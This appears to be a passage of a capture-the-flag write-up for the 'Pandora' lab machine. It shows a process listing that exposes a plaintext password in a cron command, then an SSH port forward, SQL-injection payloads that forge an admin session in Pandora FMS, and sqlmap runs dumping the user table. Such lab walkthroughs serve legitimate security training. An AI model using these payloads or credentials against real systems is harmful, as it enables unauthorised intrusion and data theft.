Matt
Last updated
Was this helpful?
Last updated
Was this helpful?
daniel@pandora:~$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.2 169508 11420 ? Ss May22 0:06 /sbin/init maybe-ubiquity
root 2 0.0 0.0 0 0 ? S May22 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? I< May22 0:00 [rcu_gp]
root 4 0.0 0.0 0 0 ? I< May22 0:00 [rcu_par_gp]
root 6 0.0 0.0 0 0 ? I< May22 0:00 [kworker/0:0H-kblockd]
root 9 0.0 0.0 0 0 ? I< May22 0:00 [mm_percpu_wq]
root 10 0.0 0.0 0 0 ? S May22 0:01 [ksoftirqd/0]
root 11 0.0 0.0 0 0 ? I May22 0:32 [rcu_sched]
root 12 0.0 0.0 0 0 ? S May22 0:00 [migration/0]
root 13 0.0 0.0 0 0 ? S May22 0:00 [idle_inject/0]
root 14 0.0 0.0 0 0 ? S May22 0:00 [cpuhp/0]
root 15 0.0 0.0 0 0 ? S May22 0:00 [cpuhp/1]
root 16 0.0 0.0 0 0 ? S May22 0:00 [idle_inject/1]
root 17 0.0 0.0 0 0 ? S May22 0:00 [migration/1]
root 18 0.0 0.0 0 0 ? S May22 0:00 [ksoftirqd/1]
root 20 0.0 0.0 0 0 ? I< May22 0:00 [kworker/1:0H-kblockd]
root 21 0.0 0.0 0 0 ? S May22 0:00 [kdevtmpfs]
root 22 0.0 0.0 0 0 ? I< May22 0:00 [netns]
root 23 0.0 0.0 0 0 ? S May22 0:00 [rcu_tasks_kthre]
root 24 0.0 0.0 0 0 ? S May22 0:00 [kauditd]
root 25 0.0 0.0 0 0 ? S May22 0:00 [khungtaskd]
root 26 0.0 0.0 0 0 ? S May22 0:00 [oom_reaper]
root 27 0.0 0.0 0 0 ? I< May22 0:00 [writeback]
root 28 0.0 0.0 0 0 ? S May22 0:00 [kcompactd0]
root 29 0.0 0.0 0 0 ? SN May22 0:00 [ksmd]
root 30 0.0 0.0 0 0 ? SN May22 0:00 [khugepaged]
root 77 0.0 0.0 0 0 ? I< May22 0:00 [kintegrityd]
root 78 0.0 0.0 0 0 ? I< May22 0:00 [kblockd]
root 79 0.0 0.0 0 0 ? I< May22 0:00 [blkcg_punt_bio]
root 80 0.0 0.0 0 0 ? I< May22 0:00 [tpm_dev_wq]
root 81 0.0 0.0 0 0 ? I< May22 0:00 [ata_sff]
root 82 0.0 0.0 0 0 ? I< May22 0:00 [md]
root 83 0.0 0.0 0 0 ? I< May22 0:00 [edac-poller]
root 84 0.0 0.0 0 0 ? I< May22 0:00 [devfreq_wq]
root 85 0.0 0.0 0 0 ? S May22 0:00 [watchdogd]
root 88 0.0 0.0 0 0 ? S May22 0:00 [kswapd0]
root 89 0.0 0.0 0 0 ? S May22 0:00 [ecryptfs-kthrea]
root 91 0.0 0.0 0 0 ? I< May22 0:00 [kthrotld]
root 92 0.0 0.0 0 0 ? S May22 0:00 [irq/24-pciehp]
root 93 0.0 0.0 0 0 ? S May22 0:00 [irq/25-pciehp]
root 94 0.0 0.0 0 0 ? S May22 0:00 [irq/26-pciehp]
root 95 0.0 0.0 0 0 ? S May22 0:00 [irq/27-pciehp]
root 96 0.0 0.0 0 0 ? S May22 0:00 [irq/28-pciehp]
root 97 0.0 0.0 0 0 ? S May22 0:00 [irq/29-pciehp]
root 98 0.0 0.0 0 0 ? S May22 0:00 [irq/30-pciehp]
root 99 0.0 0.0 0 0 ? S May22 0:00 [irq/31-pciehp]
root 100 0.0 0.0 0 0 ? S May22 0:00 [irq/32-pciehp]
root 101 0.0 0.0 0 0 ? S May22 0:00 [irq/33-pciehp]
root 102 0.0 0.0 0 0 ? S May22 0:00 [irq/34-pciehp]
root 103 0.0 0.0 0 0 ? S May22 0:00 [irq/35-pciehp]
root 104 0.0 0.0 0 0 ? S May22 0:00 [irq/36-pciehp]
root 105 0.0 0.0 0 0 ? S May22 0:00 [irq/37-pciehp]
root 106 0.0 0.0 0 0 ? S May22 0:00 [irq/38-pciehp]
root 107 0.0 0.0 0 0 ? S May22 0:00 [irq/39-pciehp]
root 108 0.0 0.0 0 0 ? S May22 0:00 [irq/40-pciehp]
root 109 0.0 0.0 0 0 ? S May22 0:00 [irq/41-pciehp]
root 110 0.0 0.0 0 0 ? S May22 0:00 [irq/42-pciehp]
root 111 0.0 0.0 0 0 ? S May22 0:00 [irq/43-pciehp]
root 112 0.0 0.0 0 0 ? S May22 0:00 [irq/44-pciehp]
root 113 0.0 0.0 0 0 ? S May22 0:00 [irq/45-pciehp]
root 114 0.0 0.0 0 0 ? S May22 0:00 [irq/46-pciehp]
root 115 0.0 0.0 0 0 ? S May22 0:00 [irq/47-pciehp]
root 116 0.0 0.0 0 0 ? S May22 0:00 [irq/48-pciehp]
root 117 0.0 0.0 0 0 ? S May22 0:00 [irq/49-pciehp]
root 118 0.0 0.0 0 0 ? S May22 0:00 [irq/50-pciehp]
root 119 0.0 0.0 0 0 ? S May22 0:00 [irq/51-pciehp]
root 120 0.0 0.0 0 0 ? S May22 0:00 [irq/52-pciehp]
root 121 0.0 0.0 0 0 ? S May22 0:00 [irq/53-pciehp]
root 122 0.0 0.0 0 0 ? S May22 0:00 [irq/54-pciehp]
root 123 0.0 0.0 0 0 ? S May22 0:00 [irq/55-pciehp]
root 124 0.0 0.0 0 0 ? I< May22 0:00 [acpi_thermal_pm]
root 125 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_0]
root 126 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_0]
root 127 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_1]
root 128 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_1]
root 130 0.0 0.0 0 0 ? I< May22 0:00 [vfio-irqfd-clea]
root 131 0.0 0.0 0 0 ? I< May22 0:00 [ipv6_addrconf]
root 141 0.0 0.0 0 0 ? I< May22 0:00 [kstrp]
root 144 0.0 0.0 0 0 ? I< May22 0:00 [kworker/u5:0]
root 157 0.0 0.0 0 0 ? I< May22 0:00 [charger_manager]
root 202 0.0 0.0 0 0 ? I< May22 0:00 [mpt_poll_0]
root 203 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_2]
root 204 0.0 0.0 0 0 ? I< May22 0:00 [mpt/0]
root 205 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_2]
root 206 0.0 0.0 0 0 ? I< May22 0:00 [cryptd]
root 207 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_3]
root 209 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_3]
root 218 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_4]
root 222 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_4]
root 226 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_5]
root 230 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_5]
root 233 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_6]
root 236 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_6]
root 238 0.0 0.0 0 0 ? S May22 0:08 [irq/16-vmwgfx]
root 240 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_7]
root 242 0.0 0.0 0 0 ? I< May22 0:00 [ttm_swap]
root 243 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_7]
root 245 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_8]
root 249 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_8]
root 252 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_9]
root 254 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_9]
root 255 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_10]
root 256 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_10]
root 257 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_11]
root 259 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_11]
root 260 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_12]
root 261 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_12]
root 263 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_13]
root 264 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_13]
root 265 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_14]
root 266 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_14]
root 267 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_15]
root 268 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_15]
root 269 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_16]
root 270 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_16]
root 271 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_17]
root 272 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_17]
root 273 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_18]
root 274 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_18]
root 275 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_19]
root 276 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_19]
root 277 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_20]
root 278 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_20]
root 279 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_21]
root 280 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_21]
root 281 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_22]
root 282 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_22]
root 283 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_23]
root 284 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_23]
root 285 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_24]
root 286 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_24]
root 287 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_25]
root 288 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_25]
root 289 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_26]
root 290 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_26]
root 291 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_27]
root 292 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_27]
root 293 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_28]
root 294 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_28]
root 295 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_29]
root 296 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_29]
root 297 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_30]
root 298 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_30]
root 299 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_31]
root 300 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_31]
root 329 0.0 0.0 0 0 ? S May22 0:00 [scsi_eh_32]
root 330 0.0 0.0 0 0 ? I< May22 0:00 [scsi_tmf_32]
root 331 0.0 0.0 0 0 ? I< May22 0:00 [kworker/0:1H-kblockd]
root 342 0.0 0.0 0 0 ? I< May22 0:00 [kdmflush]
root 344 0.0 0.0 0 0 ? I< May22 0:00 [kdmflush]
root 376 0.0 0.0 0 0 ? I< May22 0:00 [raid5wq]
root 430 0.0 0.0 0 0 ? S May22 0:00 [jbd2/dm-0-8]
root 431 0.0 0.0 0 0 ? I< May22 0:00 [ext4-rsv-conver]
root 432 0.0 0.0 0 0 ? I< May22 0:00 [kworker/1:1H-kblockd]
root 489 0.0 0.4 67872 17324 ? S<s May22 0:01 /lib/systemd/systemd-journald
root 516 0.0 0.1 21256 5348 ? Ss May22 0:01 /lib/systemd/systemd-udevd
systemd+ 526 0.0 0.1 18408 7576 ? Ss May22 0:02 /lib/systemd/systemd-networkd
root 575 0.0 0.0 0 0 ? I< May22 0:00 [nfit]
root 659 0.0 0.0 0 0 ? I< May22 0:00 [kaluad]
root 660 0.0 0.0 0 0 ? I< May22 0:00 [kmpath_rdacd]
root 661 0.0 0.0 0 0 ? I< May22 0:00 [kmpathd]
root 662 0.0 0.0 0 0 ? I< May22 0:00 [kmpath_handlerd]
root 663 0.0 0.4 214664 17992 ? SLsl May22 0:10 /sbin/multipathd -d -s
root 671 0.0 0.0 0 0 ? S May22 0:00 [jbd2/sda2-8]
root 672 0.0 0.0 0 0 ? I< May22 0:00 [ext4-rsv-conver]
systemd+ 688 0.0 0.3 24028 13028 ? Ss May22 0:11 /lib/systemd/systemd-resolved
systemd+ 692 0.0 0.1 90228 6076 ? Ssl May22 0:07 /lib/systemd/systemd-timesyncd
root 698 0.0 0.2 47540 10528 ? Ss May22 0:00 /usr/bin/VGAuthService
root 715 0.1 0.2 311496 8680 ? Ssl May22 1:48 /usr/bin/vmtoolsd
root 760 0.0 0.2 239280 9260 ? Ssl May22 0:02 /usr/lib/accountsservice/accounts-daemon
message+ 761 0.0 0.1 7612 4716 ? Ss May22 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 784 0.0 0.0 81960 3736 ? Ssl May22 0:03 /usr/sbin/irqbalance --foreground
root 791 0.0 0.4 29080 17944 ? Ss May22 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
syslog 792 0.0 0.1 224348 4856 ? Ssl May22 0:00 /usr/sbin/rsyslogd -n -iNONE
root 793 0.0 0.1 16804 7880 ? Ss May22 0:00 /lib/systemd/systemd-logind
root 795 0.0 0.3 394920 13724 ? Ssl May22 0:00 /usr/lib/udisks2/udisksd
root 836 0.0 0.0 6812 3056 ? Ss May22 0:00 /usr/sbin/cron -f
root 848 0.0 0.0 8356 3448 ? S May22 0:00 /usr/sbin/CRON -f
root 853 0.0 0.0 2608 604 ? Ss May22 0:00 /bin/sh -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'
daemon 859 0.0 0.0 3792 2284 ? Ss May22 0:00 /usr/sbin/atd -f
Debian-+ 862 0.0 0.3 22756 13216 ? Ss May22 0:38 /usr/sbin/snmpd -LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid
root 879 0.0 0.1 12176 7436 ? Ss May22 0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root 883 0.0 0.7 228068 31572 ? Ss May22 0:05 /usr/sbin/apache2 -k start
mysql 963 0.0 2.3 1710488 94028 ? Ssl May22 0:59 /usr/sbin/mysqld
root 969 0.0 0.2 236420 9084 ? Ssl May22 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 978 0.0 0.0 5828 1800 tty1 Ss+ May22 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 1154 0.0 0.0 2488 1356 ? S May22 0:00 /usr/bin/host_check -u daniel -p HotelBabylon23
root 6994 0.0 0.2 241188 9524 ? Ssl May22 0:00 /usr/lib/upower/upowerd
www-data 8791 0.0 0.3 228508 13660 ? S 00:00 0:00 /usr/sbin/apache2 -k start
www-data 8792 0.0 0.3 228508 13660 ? S 00:00 0:00 /usr/sbin/apache2 -k start
www-data 8793 0.0 0.3 228508 13660 ? S 00:00 0:00 /usr/sbin/apache2 -k start
www-data 8794 0.0 0.3 228508 13660 ? S 00:00 0:00 /usr/sbin/apache2 -k start
www-data 8795 0.0 0.3 228508 13660 ? S 00:00 0:00 /usr/sbin/apache2 -k start
root 11897 0.0 0.0 0 0 ? I 12:39 0:01 [kworker/1:0-events]
root 11926 0.0 0.0 0 0 ? I 13:03 0:00 [kworker/u4:0-events_power_efficient]
root 11927 0.0 0.0 0 0 ? I 13:03 0:02 [kworker/0:1-events]
root 12156 0.0 0.0 0 0 ? I 14:09 0:00 [kworker/0:2-events]
root 12161 0.0 0.0 0 0 ? I 14:11 0:00 [kworker/u4:1-events_power_efficient]
root 12166 0.0 0.0 0 0 ? I 14:11 0:00 [kworker/1:1-events]
root 12184 0.0 0.2 13932 8992 ? Ss 14:18 0:00 sshd: daniel [priv]
daniel 12203 0.3 0.2 18408 9512 ? Ss 14:18 0:00 /lib/systemd/systemd --user
daniel 12206 0.0 0.0 170864 3440 ? S 14:18 0:00 (sd-pam)
root 12212 0.0 0.0 0 0 ? I 14:18 0:00 [kworker/0:0-events]
root 12213 0.0 0.0 0 0 ? I 14:18 0:00 [kworker/0:3]
daniel 12329 0.0 0.1 14064 5992 ? S 14:18 0:00 sshd: daniel@pts/0
daniel 12330 0.1 0.1 8272 5108 pts/0 Ss 14:18 0:00 -bash
root 12338 0.0 0.0 0 0 ? I 14:18 0:00 [kworker/u4:2-events_unbound]
daniel 12342 0.0 0.0 8892 3324 pts/0 R+ 14:18 0:00 ps aux
daniel@pandora:~$ ls -la /usr/bin/host_check
-rwxr-xr-x 1 root root 16768 Jun 17 2021 /usr/bin/host_checkdaniel@pandora:~$ ~C
ssh> -L 8000:127.0.0.1:80
Forwarding port.http://localhost:8000/pandora_console/include/chart_generator.php?session_id=%27%20or%201=1--%20-a' UNION SELECT 'a',1,'id_usuario|s:5:"admin";' as data FROM tsessions_php WHERE '1'='1http://localhost:8000/pandora_console/include/chart_generator.php?session_id=a%27%20UNION%20SELECT%20%27a%27,1,%27id_usuario%7Cs:5:%22admin%22;%27%20as%20data%20FROM%20tsessions_php%20WHERE%20%271%27=%271adot@kali:~/oscp/pandora$ sqlmap -r req
___
__H__
___ ___[']_____ ___ ___ {1.8.3#stable}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:21:54 /2024-05-23/
adot@kali:~/oscp/pandora$ sqlmap -r req --dbs
___
__H__
___ ___[)]_____ ___ ___ {1.8.3#stable}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:26:47 /2024-05-23/adot@kali:~/oscp/pandora$ sqlmap -r req -D pandora --tables
__H__
___ ___[)]_____ ___ ___ {1.8.3#stable}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:30:47 /2024-05-23/adot@kali:~/oscp/pandora$ sqlmap -r req -D pandora -T tusuario --dump
___
__H__
___ ___[)]_____ ___ ___ {1.8.3#stable}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:30:47 /2024-05-23/
